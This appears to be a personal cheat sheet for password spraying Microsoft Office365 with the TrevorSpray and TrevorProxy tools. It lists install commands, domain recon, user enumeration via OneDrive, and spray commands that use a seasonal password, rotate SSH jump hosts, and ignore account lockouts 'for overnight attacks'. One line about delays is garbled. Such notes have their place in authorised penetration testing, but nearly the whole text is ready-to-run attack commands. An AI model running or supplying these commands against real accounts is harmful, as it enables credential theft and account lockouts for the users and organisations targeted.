A list of tools and resources that I use for password spraying Microsoft products.
Password Spraying Office365
TrevorSpray
When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever.
# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray
# Perform recon against a domain
trevorspray --recon $domain
# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3
# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10
# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin
# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts
